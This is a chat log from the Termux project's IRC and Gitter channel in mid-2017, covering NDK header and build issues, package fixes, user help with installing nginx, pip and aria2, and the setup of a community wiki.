2017-06-30 18:06:11 fornwall for those building packages, this probably means some instability - keep your eyes open for build failures or strange behaviour
2017-06-30 18:15:53 fornwall and you probably should run ./clean.sh, to ensure clean builds
2017-06-30 19:06:56 Atomic_wF4Ue sup
2017-06-30 19:10:43 live_the_dream yeah i managed to compile gccgo with unified headers
2017-06-30 19:10:55 live_the_dream as a joke
2017-06-30 19:37:59 live_the_dream /quit
2017-06-30 19:55:57 fornwall live_the_dream: it build ok with unified?
2017-06-30 19:56:16 live_the_dream a few things are annoying i was doing stuff yesterday
2017-06-30 19:56:30 live_the_dream i can build gcc
2017-06-30 19:57:16 live_the_dream but the requirement for -D__ANDROID_API__=21 for command line breaks a few things that i do but i can work around it
2017-06-30 19:57:37 live_the_dream not your concern apart from that its fine for now
2017-06-30 19:57:44 live_the_dream but i haven’t really started testing yet
2017-06-30 20:05:31 fornwall the problem, is it that -D__ANDROID_API__=21 is added to CPPFLAGS and not CFLAGS?
2017-06-30 20:06:18 fornwall because another option would be to have the gcc specs file set that value
2017-06-30 20:06:36 live_the_dream that is probably easiest
2017-06-30 20:07:01 live_the_dream but some things don’t let you set flags like that at all
2017-06-30 20:07:06 live_the_dream building gcc for instance
2017-06-30 20:07:22 live_the_dream you actually have to set that in config.h
2017-06-30 20:07:26 fornwall aha
2017-06-30 20:08:03 live_the_dream don’t know about spec file though
2017-06-30 20:08:30 live_the_dream but yeah no consistent workable way with cflags setting
2017-06-30 20:09:15 fornwall the specs file is specified with -specs=$TERMUX_SCRIPTDIR/termux.spec in CFLAGS, so perhaps that doesn’t work either, if CFLAGS is not passed around everywhere when building
2017-06-30 20:09:43 fornwall you could experiment with it, appending the lines:
2017-06-30 20:09:44 fornwall *cpp:
2017-06-30 20:09:48 fornwall -D__ANDROID_API__=21
2017-06-30 20:09:59 fornwall to termux.spec
2017-06-30 20:11:55 live_the_dream i doubt that would work though for gcc
2017-06-30 20:12:04 live_the_dream more i think about it
2017-06-30 20:23:29 fornwall live_the_dream: hm, perhaps the best option would be to patch <android/api-level.h>
2017-06-30 20:23:29 fornwall to change from
2017-06-30 20:23:31 fornwall #ifndef ANDROID_API
2017-06-30 20:23:34 fornwall #define ANDROID_API ANDROID_API_FUTURE
2017-06-30 20:23:35 fornwall #endif
2017-06-30 20:23:37 fornwall y
2017-06-30 20:23:43 fornwall and instead default to
2017-06-30 20:23:44 fornwall #define ANDROID_API 21
2017-06-30 20:24:17 fornwall then we don’t need to pass ANDROID_API on the command line when building
2017-06-30 20:24:49 fornwall both when cross compiling with the ndk, or when building on the device
2017-06-30 20:26:14 live_the_dream i tried that
2017-06-30 20:26:18 live_the_dream doesn’t work consistently
2017-06-30 20:26:34 fornwall hm, it doesn’t?
2017-06-30 20:26:42 live_the_dream i might have a screwed it up
2017-06-30 20:27:08 fornwall I just pushed a variant trying that, try it out
2017-06-30 20:27:26 fornwall I’ve started a rebuild of all packages to try it out
2017-06-30 20:28:23 fornwall the nice thing with that solution, is that we do not need to patch clang or gcc to predefine ANDROID_API when building on the device
2017-06-30 20:31:07 live_the_dream yeah im going to have rebuild everything
2017-06-30 20:33:47 live_the_dream anyway i think i might have solved the last vestiges of mpv mpd incompatibility with 5.1
2017-06-30 20:34:00 live_the_dream using the original solution i offered a while back
2017-06-30 20:34:19 live_the_dream it avoids the long the preload line
2017-06-30 20:34:20 fornwall oh, sounds nice!
2017-06-30 20:34:34 live_the_dream using symlinks for the stuff we want to load first
2017-06-30 20:35:42 live_the_dream so its LD_LIBRARY_PATH=$PREFIX/lib/specialdir:/system/lib:/system/vendor/lib:$PREFIX/lib
2017-06-30 20:36:51 live_the_dream https://its-pointless.github.io/ffmpeg-compat_0.1_arm.deb
2017-06-30 20:36:55 fornwall ok, so using symlinks in $PREFIX/lib/specialdir/ for the desired libs works better than using LD_PRELOAD for them?
2017-06-30 20:37:01 live_the_dream yeah
2017-06-30 20:37:22 fornwall nice
2017-06-30 20:37:22 live_the_dream because the long preload line exceeds a limit
2017-06-30 20:37:39 live_the_dream length too long
2017-06-30 20:38:16 fornwall ah
2017-06-30 21:19:51 live_the_dream doesn’t buiod m4
2017-06-30 21:26:34 live_the_dream im wrong nm
2017-06-30 22:43:57 gitter (vishalbiswas) @fornwall we don’t need ${TERMUX_API_LEVEL}
in standalone toolchain path anymore
2017-06-30 23:09:58 gitter (vishalbiswas) also there is no need to patch manual errno
declarations. alpine can rest them stupid patches now
2017-06-30 23:11:03 live_the_dream yes they are stupid patches
2017-07-01 00:09:03 sdrausty @vishalbiswas @fornwall On aarch64 ffmpeg [libx264 @ 0x558ed9a4d0] using cpu capabilities: ARMv8 NEON
Why is it using arm on aarch64?
2017-07-01 00:09:51 gitter (vishalbiswas) sdrausty: arm = ARM 32-bit architecture
2017-07-01 00:09:51 gitter (vishalbiswas) aarch64 = ARM 64-bit architecture
2017-07-01 00:10:02 sdrausty aahh
2017-07-01 00:10:19 gitter (vishalbiswas) generally, arm refers to armv7
2017-07-01 00:10:19 gitter (vishalbiswas) and aarch64 is armv8-a
2017-07-01 00:10:56 sdrausty ▄██ ███ ██▄ OS: Android 6.0.1 aarch64
2017-07-01 00:16:58 sdrausty ffmpeg/stable,now 3.3.2-2 aarch64 [installed]
2017-07-01 00:16:58 sdrausty ffmpeg-dev/stable,now 3.3.2-2 aarch64 [installed]
2017-07-01 00:21:11 sdrausty @vishalbiswas So based on what your stating, “The aarch64 ffmpeg is using 32 bit, not 64?”
2017-07-01 00:21:22 gitter (vishalbiswas) no
2017-07-01 00:21:29 sdrausty ok
2017-07-01 00:22:41 sdrausty Do you have any Idea why ffmpeg uses arm on aarch?
2017-07-01 00:23:19 gitter (vishalbiswas) it doesn’t? how do you know that it does that?
2017-07-01 00:23:47 sdrausty ffmpeg does amazing work: https://m.youtube.com/playlist?list=PLJ6pP26JOyIN7tho_Y3IUADTt6mTZ94Ag
2017-07-01 00:24:16 sdrausty On device in Termux!
2017-07-01 00:27:35 sdrausty @vishalbiswas [libx264 @ 0x558ed9a4d0] using cpu capabilities: ARMv8 NEON
on aarch64?
2017-07-01 00:28:49 gitter (vishalbiswas) ARMv8 = aarch64
2017-07-01 00:28:57 gitter (vishalbiswas) armv7 = 32 bits
2017-07-01 00:31:14 sdrausty Right, any idea why ffmpeg is using arm capabilities on aarch64? Just a passing question since ffmpeg seems to be working fine.
2017-07-01 00:35:19 gitter (vishalbiswas) aarch64 is arm 64 bits, I don’t understand what you are getting at…
2017-07-01 00:38:01 sdrausty got it “AArch64 Floating-point and NEON The ARM Advanced SIMD architecture” Thank you @vishalbiswas
2017-07-01 18:52:35 gitter (TheDiamondYT1) Where is the IRC channel
2017-07-01 18:52:57 gitter (TheDiamondYT1) @vishalbiswas Are you just a general contributor to termux ?
2017-07-01 19:01:39 live_the_dream irc on freenode #termux
2017-07-01 19:08:41 live_the_dream also fornwall libutil-dev and ndk-sysroot both have pty.h … coreutils and procps both have uptime in bin when i did build-all.sh
2017-07-01 20:18:03 TheDiamondYT Hi
2017-07-01 20:18:17 gitter (TheDiamondYT1) Hi
2017-07-01 20:18:24 TheDiamondYT Thats weird
2017-07-01 20:18:26 TheDiamondYT Lol
2017-07-01 20:32:56 live_the_dream the new tmux build currently segfaults but tmate works…
2017-07-01 20:32:58 live_the_dream ?
2017-07-02 00:41:26 gitter (vishalbiswas) @TheDiamondYT1 yes
2017-07-02 00:55:53 gitter (vishalbiswas) @fornwall I haven’t updated the build revision of mariadb. If you don’t find any problems with it, please update it
2017-07-02 02:52:57 Gautam888 Hello
2017-07-02 02:53:33 Gautam888 Cjbc
2017-07-02 02:53:50 Gautam888 Fyg
2017-07-02 02:55:12 gitter (vishalbiswas) Gautam888: hey
2017-07-02 02:56:08 delt Hello, termux is not accepting input from my physical bluetooth keyboard, other apps don’t have this problem
2017-07-02 02:56:31 delt including the builtin terminal app of lineage os, works perfectly
2017-07-02 03:05:50 rods-tab3 my bt keyboard works fine – ??
2017-07-02 04:39:59 fornwall live_the_dream: “the new tmux build currently segfaults”, is that when building now with unified headers, or do you mean the package in the apt repo?
2017-07-02 04:40:55 live_the_dream new headers
2017-07-02 04:41:02 live_the_dream on aaarch64
2017-07-02 04:41:13 live_the_dream also segfaulting on arm
2017-07-02 04:41:17 live_the_dream on lots of things
2017-07-02 04:41:38 live_the_dream using the docker image
2017-07-02 04:41:44 live_the_dream just compiled stuff
2017-07-02 04:43:10 fornwall ok, I’m looking into it
2017-07-02 05:21:59 fornwall live_the_dream: just pushed a fix for tmux, good find!
2017-07-02 05:39:02 fornwall and uptime has been removed from coreutils now. I guess the new headers caused coreutils to start building it
2017-07-02 05:59:54 fornwall and pty.has been removed from libutil-dev, it’s provided by ndk-sysroot now (so the libutil-dev package won’t be built anymore)
2017-07-02 07:59:10 gitter (fornwall) @vishalbiswas I get an undefined reference to __atomic_load_8
when building mariadb for i686. I thought adding LDFLAGS+=" -latomic"
would fix that, but it does not
2017-07-02 08:00:11 gitter (fornwall) but it does seem to work fine on 32-bit arm, which is nice!
2017-07-02 08:27:46 live_the_dream yeah least used arch is i686
2017-07-02 08:28:07 live_the_dream fuck it
2017-07-02 15:04:58 fornwall live_the_dream: right, deprecating and moving towards dropping i686 probably makes sense
2017-07-02 15:41:48 gitter (fornwall) @vishalbiswas ok, CFLAGS+=" -latomic"
actually fixed i686
2017-07-02 15:41:56 gitter (fornwall) instead of LDFLAGS
2017-07-03 02:04:54 nayan ok
2017-07-03 02:05:07 nayan testing irc with termux
2017-07-03 02:05:30 nayan thanks fornwall for this awesome creation
2017-07-03 04:53:21 BigPhreak Hello
2017-07-03 04:55:42 BigPhreak Hiiiiiii
2017-07-03 11:31:20 gitter (vishalbiswas) problems relating to /sdcard in npm seem to be the same.
2017-07-03 11:32:54 gitter (vishalbiswas) so npm thinks the sub directory is ext4 and tries to chmod/utime on it
2017-07-03 11:34:09 gitter (vishalbiswas) @fornwall I don’t know my way around npm, maybe this info will help you
2017-07-03 14:13:41 gitter (hariswhdn) How to install nginx
2017-07-03 16:09:10 sdrausty @hariswhdn pkg install nginx
2017-07-03 16:33:12 rods-tab3 i thought it was: apt install nginx
2017-07-03 16:42:05 rods-tab3 ah, packages cmd just link to pkg which is shell script front end to ‘apt’ cmd
2017-07-03 16:43:15 rods-tab3 except - pkg files
2017-07-04 04:15:28 gitter (hariswhdn) @TermuxBot please step by step
2017-07-04 04:15:53 gitter (hariswhdn) I want to install nginx, php as cgi, and mariadb
2017-07-04 04:25:22 gitter (hariswhdn) Is it right
2017-07-04 04:25:31 gitter (hariswhdn) apt install php-fpm
2017-07-04 04:25:38 gitter (hariswhdn) apt install nginx
2017-07-04 04:25:42 gitter (hariswhdn) apt install mariadb
2017-07-04 06:38:17 gitter (hariswhdn) How to setup?
2017-07-04 07:32:04 live_the_dream building on arm on device with binutils made with unified headers …. don’t work?
2017-07-04 07:44:58 gitter (hariswhdn) I do not understand
2017-07-04 08:13:13 live_the_dream its okay the bug is not present on official binutils
2017-07-04 09:19:49 fornwall live_the_dream: you get something like ‘crtbegin_dynamic.o: file not recognized: File truncated’?
2017-07-04 09:35:06 fornwall hm, it seems to be fixed by ‘export ac_cv_sys_file_offset_bits=no’, which disables the _FILE_OFFSET_BITS=64 flag
2017-07-04 09:36:34 fornwall the problem with _FILE_OFFSET_BITS=64, which makes off_t 64-bit also on 32-bit systems, in order to make several libc functions work with file sizes larger than 32 bits / 2 gb
2017-07-04 09:37:08 fornwall is that it’s only fully implemented on android 7.0, so when compiling for lower api levels (which we do in termux, targetting android 5.0)
2017-07-04 09:37:37 fornwall it may cause nasty problems. I’ve reported it do the ndk at https://github.com/android-ndk/ndk/issues/442
2017-07-04 09:38:10 fornwall so we may need to patch away the _FILE_OFFSET_BITS=64 support from the ndk headers to avoid these problems
2017-07-04 09:57:39 gitter (noncom) what do you usually do when some ./configure
says that it can’t write to /usr
?
2017-07-04 09:58:00 gitter (noncom) I am trying to install the C kernel for Jupyter Notebook
2017-07-04 09:58:16 gitter (noncom) also, did anyone have any success with the kernels besides the Pythonic one?
2017-07-04 09:59:13 gitter (hariswhdn) Pls answer my question
2017-07-04 09:59:15 frumpylava @noncom check the configure if there is a flag or something to configure where to install the stuff. Otherwise you can run under termux-chroot.
2017-07-04 10:00:47 gitter (hariswhdn) I already search hundred times to setup nginx, php-fpm and mariadb and got no surely answer
2017-07-04 10:03:27 gitter (noncom) frumpylava great, gonna try that out
2017-07-04 10:05:32 gitter (hariswhdn) @noncom yes, i want to run wordpress by termux as a server. Idk what bootstrap is
2017-07-04 10:05:40 gitter (noncom) BTW, GUYS just because Termux is so loved by IT people and one of the common topics is “how to setup a programming environment X under Termux?”, don’t you think that there could be a maintained info page just about that? So that anyone interested could jump right in? Now much of the material is scattered and people are asking here all the time..
2017-07-04 10:06:13 gitter (noncom) if the number of users increases, this chat shall be flooded with that kind of QAs
2017-07-04 10:12:28 frumpylava @hariswhdn you run nginx
2017-07-04 10:12:50 gitter (hariswhdn) Yes
2017-07-04 10:13:58 frumpylava that wasn’t a question. The command you use to start nginx is literally nginx
2017-07-04 10:15:08 gitter (hariswhdn) “nginx start” is invalid command
2017-07-04 10:16:15 frumpylava @noncom I was thinking more like a mediawiki. It would be easier to maintain as you don’t have to have an editor look at all pull requests.
2017-07-04 10:18:17 frumpylava @hariswhdn it’s just nginx
not nginx start
2017-07-04 10:18:48 gitter (noncom) frumpylava right… I don’t have much knowledge on how such wikies are set up
2017-07-04 10:18:49 frumpylava You type n, g, i, n, x and then press enter.
2017-07-04 10:19:02 gitter (noncom) do you know any good paper to read about it?
2017-07-04 10:19:15 gitter (noncom) also, what is “wiki” at all? I mean, what does that word mean?
2017-07-04 10:19:26 frumpylava if it complains about bind() it’s already running. navigate to localhost:8080 in your browser @hariswhdn
2017-07-04 10:19:33 gitter (hariswhdn) tmp-mksh: nginx: not found, what is mean?
2017-07-04 10:19:36 gitter (noncom) ah, https://en.wikipedia.org/wiki/Wiki
2017-07-04 10:21:14 gitter (noncom) so
2017-07-04 10:21:20 gitter (noncom) like, you choose one of these https://en.wikipedia.org/wiki/Comparison_of_wiki_software
2017-07-04 10:21:39 gitter (noncom) and run it somewhere?
2017-07-04 10:21:52 gitter (noncom) are there wiki cloud providers or something?
2017-07-04 10:22:03 gitter (noncom) googling “wiki provider” gives up wiki pages on what is a “provider”
2017-07-04 10:22:24 frumpylava @noncom basically yes. I’d choose mediawiki because it’s the one made by wikipedia.
2017-07-04 10:22:24 gitter (noncom) found https://www.mediawiki.org/wiki/Hosting_services
2017-07-04 10:22:53 frumpylava there is wikia, which you can use to create wikis, but it’s to wikis what tumblr is to blogs.
2017-07-04 10:23:14 gitter (noncom) oh well
2017-07-04 10:23:44 frumpylava @noncom Would you be willing to work on a wiki about termux (write main page, maybe populate it with a few easy articles)?
2017-07-04 10:23:44 gitter (noncom) like.. .ok, but now it’s like one has to choose between all these available clouds… licences and omg other stuff
2017-07-04 10:24:05 gitter (noncom) I could work on something like that, yes
2017-07-04 10:24:08 gitter (noncom) at least we could start it
2017-07-04 10:24:45 gitter (noncom) especially that there are so many knowledgeable people here that there won’t be any lack of support regarding the content
2017-07-04 10:25:27 frumpylava I could set up a media wiki instance on my webserver later today. Are you around in 3.5 hours? Then you could help me write the main page.
2017-07-04 10:28:46 gitter (noncom) if this timing suits you
2017-07-04 10:29:01 aleph- I’ll write some man pages if I have the time.
2017-07-04 10:30:00 gitter (noncom) aleph- cool!
2017-07-04 10:32:03 frumpylava aleph-: in the wiki or literal man pages?
2017-07-04 10:34:20 aleph- Wiki
2017-07-04 10:35:01 gitter (noncom) oh, yeah, I thought you meant wiki too :D
2017-07-04 11:01:03 gitter (vishalbiswas) frumpylava: can you give me a deb of php-mysql for arm?
2017-07-04 11:02:14 frumpylava @vishalbiswas actually no. I can’t seem to build mariadb at all since recently. Complains about not finding gnutls.
2017-07-04 11:02:58 gitter (vishalbiswas) @hariswhdn you can follow any online tutorial for setting up nginx on ubuntu as long as you don’t change the default port
2017-07-04 11:04:48 gitter (vishalbiswas) frumpylava: you can extract files from deb to your /data
2017-07-04 11:06:19 frumpylava @vishalbiswas I don’t have the deb for arm, I’d have to compile it, which currently fails at mariadb: Could NOT find GnuTLS (missing: GNUTLS_LIBRARY GNUTLS_INCLUDE_DIR)
2017-07-04 11:06:48 frumpylava This is happening since I updated the docker container to 15.1
2017-07-04 11:08:12 frumpylava @vishalbiswas does compiling mariadb still work for you?
2017-07-04 11:12:13 gitter (vishalbiswas) frumpylava: you can download mariadb for arm at termux.net
2017-07-04 11:12:59 gitter (vishalbiswas) You won’t have to build mariadb now
2017-07-04 11:13:42 gitter (vishalbiswas) No, I don’t usually use docker
2017-07-04 11:14:05 gitter (vishalbiswas) Is your docker up-to-date (17.04)?
2017-07-04 11:20:01 frumpylava @vishalbiswas Alright. I’ll try that. give me 2 hours.
2017-07-04 11:27:44 gitter (noncom) frumpylava so, I am about to leave for a journey across the heated urban landscape.. gonna be back online as in about 3 – 3.5 from now…
2017-07-04 11:28:27 gitter (noncom) and if you’re here, we can work on the wiki page!
2017-07-04 15:57:39 frumpylava @noncom, aleph- : I set up a mediawiki. https://termux-wiki.glow.li It would be nice if someone wrote at least a short intro on the Main Page.
2017-07-04 16:12:39 rods-tab3 it is our holiday here, so noone works
2017-07-04 16:32:49 frumpylava fornwall: I sent you a (signed) email about the wiki.
2017-07-04 17:32:56 frumpylava @vishalbiswas Sorry I didn’t get to compiling php-mysql today. I will look at it in the next few days. Or you could compile it yourself by cloning my branch.
2017-07-04 17:51:44 gitter (noncom) I have registered within the system, but my creative muse is sleeping already
2017-07-04 17:51:54 gitter (noncom) let’s see what tomorrow brings
2017-07-04 17:58:45 frumpylava @noncom Alright. I’m also spent. This took way longer to set up than I expected.
2017-07-04 18:18:09 live_the_dream i see fornwall it shouldn’t be in effect at api 21
2017-07-04 19:19:19 fornwall frumpylava: hm, about building mariadb, it seems to that the native/host build requires something like libgnutls28-dev to be installed
2017-07-04 19:19:28 fornwall which it is not in the default docker setup
2017-07-04 20:31:28 fornwall frumpylava: does wiki.termux.com work for you now?
2017-07-05 00:35:49 lbr83 Hello
2017-07-05 01:55:54 frumpylava fornwall: Yes. excellent. thanks. I created the Certificate. https://wiki.termux.com is now a thing.
2017-07-05 03:50:59 fornwall frumpylava: nice!
2017-07-05 05:47:19 AndChat22484 hi
2017-07-05 05:47:47 AndChat22484 how is termux accomplished
2017-07-05 05:51:52 AndChat22484 is anyone alive
2017-07-05 05:53:18 AndChat | 22484 is anyone alive |
2017-07-05 06:23:13 live_the_dream /
2017-07-05 06:23:13 live_the_dream ?
2017-07-05 06:31:56 AndChat | 22484 assumming i do this “env -i LD_LIBRARY_PATH=/data/data/com.termux/files/usr/lib ../usr/bin/bash” what else would i need to do to corretly set up bash |
2017-07-05 06:35:35 frumpylava AndChat | 22484: Check out what I do in chrooted-termux here: https://github.com/Neo-Oli/chrooted-termux/blob/master/chrooted-termux#L51. Line 51 to 61 is what I do to get the shell working in a proot jail. |
2017-07-05 09:57:54 nekmit herro
2017-07-05 10:37:58 u0_a157 Diggin’ the royal fuuuuuck out of Termux. :)
2017-07-05 11:08:13 Cardinal_ exit
2017-07-05 11:08:16 Cardinal_ rofl
2017-07-05 13:05:55 andchat why doesnt LD_LIBRARY_PATH work for all applications?
2017-07-05 14:40:00 gitter (noncom) or how does it work? do we have to agree on something?
2017-07-05 14:40:07 gitter (noncom) like, format or content or something?
2017-07-05 14:42:09 frumpylava @noncom yeah. you can just create or edit any page you want.
2017-07-05 14:43:15 frumpylava By the way is it just me or is the gitter bot really spotty today. I only see half the messages that I see on gitter.
2017-07-05 14:43:39 frumpylava I don’t see @vishalbiswas’ message about the favicon at all.
2017-07-05 14:48:08 frumpylava @vishalbiswas which, by the way, I just fixed.
2017-07-05 16:52:54 andchat hi
2017-07-05 16:52:58 andchat i need help
2017-07-05 17:39:59 alphac0de does anyone know how to use metasploit in termux
2017-07-06 02:19:36 Auxilus I am having error while installing metasploit
2017-07-06 02:19:53 Auxilus Here is the pastebin for it =>
2017-07-06 02:20:06 Auxilus https://pastebin.com/Eys9azv1
2017-07-06 02:29:45 Auxilus_ https://pastebin.com/Eys9azv1
2017-07-06 07:47:02 htafdresgi why does my termux quite overnight? I want it to stay on all the time
2017-07-06 07:47:25 htafdresgi it’s annoying to have to start it up every morning.
2017-07-06 07:48:23 live_the_dreams its android doing that
2017-07-06 07:48:32 live_the_dreams you can aqure a wakelock
2017-07-06 07:48:56 htafdresgi how do I do that?
2017-07-06 07:49:41 frumpylava htafdresgi: Do you have any things running at night that might need a huge amound of RAM? I had foldersync running every night and that caused all other apps to be closed, because it needed so much memory.
2017-07-06 07:50:04 htafdresgi nope nothing
2017-07-06 07:50:31 htafdresgi well I don’ in regards to other apps what they do. I could try closing a bunch of them.
2017-07-06 07:50:54 live_the_dreams termux-wake-lock command
2017-07-06 07:51:58 htafdresgi thanks I’ll try that
2017-07-06 07:52:30 frumpylava It will cause android not to go to sleep, so it might use more battery.
2017-07-06 07:53:12 htafdresgi it’s okay, I use it for bulk sms, so it’s always plugged in.
2017-07-06 07:58:10 frumpylava htafdresgi: I would also keep an eye on memory. If termux uses up more ram than available, it will close also.
2017-07-06 07:58:52 frumpylava echo “scale=2147483647; 4*a(1)” | bc -l |
2017-07-06 07:58:56 frumpylava Will kill termux
2017-07-06 09:18:59 htafdresgi can I make swap files?
2017-07-06 09:21:09 htafdresgi thanks I’ll try that
2017-07-06 16:37:38 gitter (fornwall) the gitter irc/bot should be up again
2017-07-06 16:49:57 andchat hi
2017-07-06 17:03:03 gitter (hariswhdn) Hallo guys
2017-07-06 17:03:34 gitter (hariswhdn) I want to ask how to install python-pip and python-setuptools?
2017-07-06 17:19:55 nekmit apt install python-pip
2017-07-06 17:19:55 nekmit i guess
2017-07-06 17:20:40 nekmit apt install python-setuptools
2017-07-06 17:25:41 gitter (hariswhdn) nekmit command wrong
2017-07-06 17:26:11 gitter (hariswhdn) Btw i just install git repo on wrong folder xD
2017-07-06 17:26:26 gitter (DatOneLefty) is there any way to install java on termux?
2017-07-06 17:26:36 gitter (hariswhdn) Can i just move it by file manager?
2017-07-06 17:36:40 nekmit idk about java
2017-07-06 17:39:59 gitter (hariswhdn) i just install git repository on wrong folder.
2017-07-06 18:38:55 gitter (hariswhdn) Solved
2017-07-06 18:49:24 live_the_dreams fornwall you patched fix for _FILE_OFFSET_BITS=64 when ANDROID_API < 24 on arm for termux build or should i do that myself?
2017-07-06 18:51:10 live_the_dreams https://android-review.googlesource.com/#/c/429481/ for those that don’t know
2017-07-06 19:00:04 fornwall live_the_dreams: I’m looking at it, I’m currently thinking about patching away _FILE_OFFSET_BITS=64 support unless the targeted api level is 24
2017-07-06 19:00:34 live_the_dreams the proposed patch is to revert
2017-07-06 19:00:54 live_the_dreams its already done there googlesource url
2017-07-06 19:01:10 live_the_dreams will be in next ndk
2017-07-06 19:07:25 fornwall that commit in the ndk will cause fgetpos,fsetpos,fseeko,ftello and funopen to not be defined by the headers when building for earlier than android-24
2017-07-06 19:08:59 fornwall but the functions will still exist in libc, and unless building with -Werror=implicit-function-declaration will be implicitly declared and then broken at runtime as before
2017-07-06 19:09:40 fornwall sorry, meant “not be defined by the headers when building for earlier than android-24 and using _FILE_OFFSET_BITS=64”, that is
2017-07-06 19:11:23 fornwall adding -Werror=implicit-function-declaration to the default CFLAGS in termux is probably a good idea, I’m currently building everything with it to see what needs to be fixed
2017-07-06 19:12:36 fornwall when -Werror=implicit-function-declaration is in, we can try out the solution in the ndk commit, to make fgetpos and friends be undefined when _FILE_OFFSET_BITS=64
2017-07-06 19:15:41 fornwall because then we can see if packages are trying to use any of those functions in combination with _FILE_OFFSET_BITS=64
2017-07-06 19:17:22 fornwall and if that is a common problem breaking a lot of packages, we can fall back to only supporting _FILE_OFFSET_BITS=64 when ANDROID_API = 24, and have mariadb target android-24 on 32-bit
2017-07-06 19:18:07 fornwall hm, that was a lot of text :). does it make sense?
2017-07-06 19:18:12 live_the_dreams yes
2017-07-06 19:19:36 fornwall it will be really nice to have -Werror=implicit-function-declaration in regardless of _FILE_OFFSET_BITS. the implicit function declaration in C is just a horrible thing, and has caused several bugs in termux packages before
2017-07-06 22:14:16 fornwall the docker image has been updated with the libgnutls-dev package needed to build mariadb now
2017-07-06 22:15:16 fornwall as for _FILE_OFFSET_BITS=64, it’s disabled for now by patching away the support for it in <sys/cdefs.h>
2017-07-06 22:17:56 fornwall it’s just too many issues for now, with bugs in the ndk and the risk of mixing libraries and programs (where e.g. a library has been compiled in one way, and another program or library using it in another, that passes off_t or a derived type between them)
2017-07-06 22:18:19 fornwall which includes things not in packages, built by users (pip/gem/custom builds)
2017-07-07 05:29:54 gitter (andymarsden100) Hi, trying to use termux on android to install ipython/scipy but struggling with the basics.
2017-07-07 05:30:07 gitter (andymarsden100) apt-get install build-essential fails
2017-07-07 05:30:47 gitter (andymarsden100) Unable to locate package build-essential
2017-07-07 05:31:04 gitter (andymarsden100) Any ideas (apt update already tried)
2017-07-07 05:38:38 live_the_dreams easy solution there is a seperate repo that can install scipy directly github.com/its-pointless/gcc_termux
2017-07-07 07:08:31 live_the_dreams i guess i should write a bit in the wiki…
2017-07-07 07:21:35 frumpylava live_the_dreams: agreed ;)
2017-07-07 07:23:03 andchat anyone use aria2? (aria2c)
2017-07-07 07:23:15 frumpylava andchat: yes.
2017-07-07 07:23:27 andchat do u know how to maximize the download speed to the highest possible? cus at the moment im using this aria2c -q “${URL[i]}” –split=512 –max-connection-per-server=16 –min-split-size=1M –max-concurrent-downloads=512 –continue –conditional-get=true –allow-overwrite=true –dir=/ -o “${destination[i]}” wich gets me 1.0mb/s to 1.4mb/s wich isnt enough on a 1 gb test file
2017-07-07 07:25:29 andchat (note i get like 10 times less if i use aria2c -q “${URL[i]}” –continue –conditional-get=true –allow-overwrite=true –dir=/ -o “${destination[i]}”)
2017-07-07 07:27:22 frumpylava andchat: Wow. I have no idea. This doesn’t seem Termux-specific. Is there an aria2 irc channel or a mailinglist?
2017-07-07 07:28:04 andchat no ;-;
2017-07-07 07:29:22 BrainDamage you /don’t/ want multiple parallel conections if you can get away with it
2017-07-07 07:29:33 BrainDamage each connection adds overhead
2017-07-07 07:30:10 andchat what do u suggest instead?
2017-07-07 07:31:01 BrainDamage if you get speedups doing massive parallel downloads, then the host is likely throttling speed per connection
2017-07-07 07:31:19 BrainDamage which while might work for some specific hosts, won’t in general
2017-07-07 07:31:39 andchat ok
2017-07-07 07:32:19 BrainDamage a few connections, do helpin general because they sometimes get routed trough different nodes inbetween so you can avoid slow nodes
2017-07-07 07:33:03 BrainDamage but the endpoints are the same, if you’re bottlenecked by the server or your own connection speed, multiple connections won’t help, if anything, they’ll make things worse
2017-07-07 07:35:28 andchat but how do i increase the download speed
2017-07-07 07:36:11 BrainDamage how fast is your network link?
2017-07-07 07:36:40 andchat idk
2017-07-07 07:43:16 andchat https://www.thinkbroadband.com/speedtest/1499427686584521755
2017-07-07 07:46:17 BrainDamage that’s a direct measurement, not the max capacity, max capacity could be higher, if it’s accurate, for that value,your downloads are as good as they get and won’t improve short of magic pixe dust
2017-07-07 07:47:24 andchat ;-;
2017-07-07 07:48:35 frumpylava Aria2 shows download rate in MiB Which is Mebibytes, and that speedtest shows it in megabits per second. 10 Mbps is 1.2 MiB. So aria2 downloads right around the maximum for your connection.
2017-07-07 07:52:26 andchat so 10 Mbps is 120 MiB?
2017-07-07 07:52:57 andchat no
2017-07-07 07:52:57 frumpylava No. 10 Mbps is 1.2 MiB
2017-07-07 07:53:54 andchat whats a good website to test the max capacity
2017-07-07 07:54:01 BrainDamage you can’t use a website
2017-07-07 07:54:05 andchat ;-;
2017-07-07 07:54:23 BrainDamage you ask your isp/router
2017-07-07 07:54:51 andchat how
2017-07-07 07:56:27 BrainDamage enter the status page for the router, and/or phone your isp and ask for help
2017-07-07 08:00:56 andchat how do i do that
2017-07-07 08:01:04 andchat i have Foxtel Hub
2017-07-07 08:02:31 BrainDamage I’m not going to google for you
2017-07-07 08:02:33 andchat https://www.foxtel.com.au/about-foxtel-broadband/foxtel-modem.html
2017-07-07 08:02:44 frumpylava What is your ISP?
2017-07-07 08:04:20 andchat idk
2017-07-07 08:04:43 frumpylava https://www.whoismyisp.org/
2017-07-07 08:08:07 andchat i have FoxtelHubMedia66EF wich has mode up to 1300mbps
2017-07-07 08:08:29 andchat aswell as FoxtelHub66EF up to 300mbps
2017-07-07 08:09:15 andchat Your Internet Service Provider (ISP) is ‘Foxtel’. In some cases an ISP uses the network of another ISP
2017-07-07 08:09:24 andchat Your external IP address is 172.192.210.52. This is an address used to identify your internet connection.
2017-07-07 08:09:31 andchat The hostname of your internet connection is ‘cpe-172-192-210-52.qld.foxtel.net.au’.
2017-07-07 08:14:04 frumpylava andchat: Well, then you can call “131 999” and ask them.
2017-07-07 08:19:42 standard_ nu’
2017-07-07 08:19:46 standard_ nu*
2017-07-07 08:34:52 standard_ xDSL Link Downstream Upstream
2017-07-07 08:34:52 standard_ Connection Speed 19851 kbps 1077 kbps
2017-07-07 08:35:09 standard_ from http://www.routerlogin.net/RST_statistics.htm
2017-07-07 08:37:46 frumpylava Seems about right. 20000 kbps are 20 mbps, which would come to aboit 2.4 MiB.
2017-07-07 08:38:41 frumpylava You’re only going to get your max capacity if the server is very close to you (in both location and nodes between you and it)
2017-07-07 08:38:59 andchat ok
2017-07-07 08:40:39 andchat is there a http and an ftp link to the same iso i can use’
2017-07-07 08:42:49 frumpylava Well you can use torrents. With it you could come pretty close to the max capacity, if it’s seeded well.
2017-07-07 08:50:13 andchat ok
2017-07-07 14:16:46 dinoSalta hi everyone
2017-07-07 14:16:50 dinoSalta :)
